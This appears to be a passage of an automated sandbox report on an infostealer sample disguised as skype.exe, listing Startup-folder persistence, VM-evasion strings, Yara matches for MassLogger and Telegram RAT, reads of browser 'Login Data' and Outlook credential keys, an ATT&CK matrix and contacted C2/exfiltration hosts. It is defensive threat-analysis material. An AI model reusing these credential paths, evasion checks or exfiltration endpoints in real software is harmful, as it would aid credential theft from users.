Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 98569	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 98462	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 98352	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 98243	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 98134	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 98024	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 97909	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 97790	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 97681	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 97571	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 97462	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 97352	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 97243	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 97134	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 97024	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 96898	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 96790	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 96681	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 96571	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 96462	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 96352	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 96243	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 96131	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: skype.exe, 00000003.00000002.1837219390.00000000031F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: skype.exe, 00000003.00000002.1837219390.00000000031F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: PI 00928292828.exe, 00000001.00000002.2942324299.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2943277640.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\PI 00928292828.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.PI 00928292828.exe.5f90000.6.raw.unpack, NativeMethods.cs	Reference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
Source: 0.2.PI 00928292828.exe.5f90000.6.raw.unpack, ResourceReferenceValue.cs	Reference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
Source: 0.2.PI 00928292828.exe.44b4218.1.raw.unpack, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.PI 00928292828.exe.44b4218.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))

Source: C:\Users\user\Desktop\PI 00928292828.exe	Process created: C:\Users\user\Desktop\PI 00928292828.exe "C:\Users\user\Desktop\PI 00928292828.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\skype.exe "C:\Users\user\AppData\Roaming\skype.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Process created: C:\Users\user\AppData\Roaming\skype.exe "C:\Users\user\AppData\Roaming\skype.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe	Queries volume information: C:\Users\user\Desktop\PI 00928292828.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Queries volume information: C:\Users\user\Desktop\PI 00928292828.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PI 00928292828.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Queries volume information: C:\Users\user\AppData\Roaming\skype.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Queries volume information: C:\Users\user\AppData\Roaming\skype.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MSIL Logger

Source: Yara match	File source: 1.2.PI 00928292828.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PI 00928292828.exe.44b4218.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PI 00928292828.exe.44b4218.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2941514043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2941514043.0000000000417000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PI 00928292828.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PI 00928292828.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: skype.exe PID: 7600, type: MEMORYSTR

Yara detected MassLogger RAT

Source: Yara match	File source: 0.2.PI 00928292828.exe.44b4218.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PI 00928292828.exe.44b4218.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PI 00928292828.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: skype.exe PID: 7600, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.PI 00928292828.exe.44b4218.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PI 00928292828.exe.44b4218.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PI 00928292828.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PI 00928292828.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: skype.exe PID: 7600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: skype.exe PID: 7648, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\skype.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\PI 00928292828.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Users\user\AppData\Roaming\skype.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.PI 00928292828.exe.44b4218.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PI 00928292828.exe.44b4218.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PI 00928292828.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PI 00928292828.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: skype.exe PID: 7600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: skype.exe PID: 7648, type: MEMORYSTR

Remote Access Functionality

Yara detected MSIL Logger

Source: Yara match	File source: 1.2.PI 00928292828.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PI 00928292828.exe.44b4218.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PI 00928292828.exe.44b4218.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2941514043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2941514043.0000000000417000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PI 00928292828.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PI 00928292828.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: skype.exe PID: 7600, type: MEMORYSTR

Yara detected MassLogger RAT

Source: Yara match	File source: 0.2.PI 00928292828.exe.44b4218.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PI 00928292828.exe.44b4218.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PI 00928292828.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: skype.exe PID: 7600, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.PI 00928292828.exe.44b4218.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PI 00928292828.exe.44b4218.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PI 00928292828.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PI 00928292828.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: skype.exe PID: 7600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: skype.exe PID: 7648, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	1 Native API	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	12 Software Packing	NTDS	21 Security Software Discovery	Distributed Component Object Model	1 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PI 00928292828.exe	46%	Virustotal		Browse
PI 00928292828.exe	42%	ReversingLabs	Win32.Infostealer.Tinba
PI 00928292828.exe	100%	Avira	TR/AD.SnakeStealer.vpkoz

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\skype.exe	100%	Avira	TR/AD.SnakeStealer.vpkoz
C:\Users\user\AppData\Roaming\skype.exe	42%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label	Link
http://mail.mzgold.ird	0%	Avira URL Cloud	safe
http://mail.mzgold.ir	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.112.1	true	false	high
mail.mzgold.ir	217.144.107.148	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
http://checkip.dyndns.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://stackoverflow.com/q/14436606/23354	PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp, PI 00928292828.exe, 00000000.00000002.1691908965.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1837219390.00000000031F5000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r11.o.lencr.org0#	PI 00928292828.exe, 00000001.00000002.2942324299.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2950272190.0000000006094000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2950272190.00000000060B4000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2950213670.0000000005E6C000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2950213670.0000000005E30000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2943277640.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mail.mzgold.ird	PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://reallyfreegeoip.orgd	PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000285B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mail.mzgold.ir	PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-net	PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	PI 00928292828.exe, 00000001.00000002.2945608145.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.0000000002832000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r11.i.lencr.org/0	PI 00928292828.exe, 00000001.00000002.2942324299.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2950272190.0000000006094000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2950272190.00000000060B4000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2950213670.0000000005E6C000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2950213670.0000000005E30000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2943277640.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-neti	PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189l	PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.comd	PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	PI 00928292828.exe, 00000001.00000002.2950272190.00000000060B9000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2942324299.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2950272190.00000000060B4000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2950672050.0000000005E73000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2950213670.0000000005E30000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2943277640.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	PI 00928292828.exe, 00000001.00000002.2950272190.00000000060B9000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2942324299.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2950272190.00000000060B4000.00000004.00000020.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2950672050.0000000005E73000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2950213670.0000000005E30000.00000004.00000020.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2943277640.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp	false		high
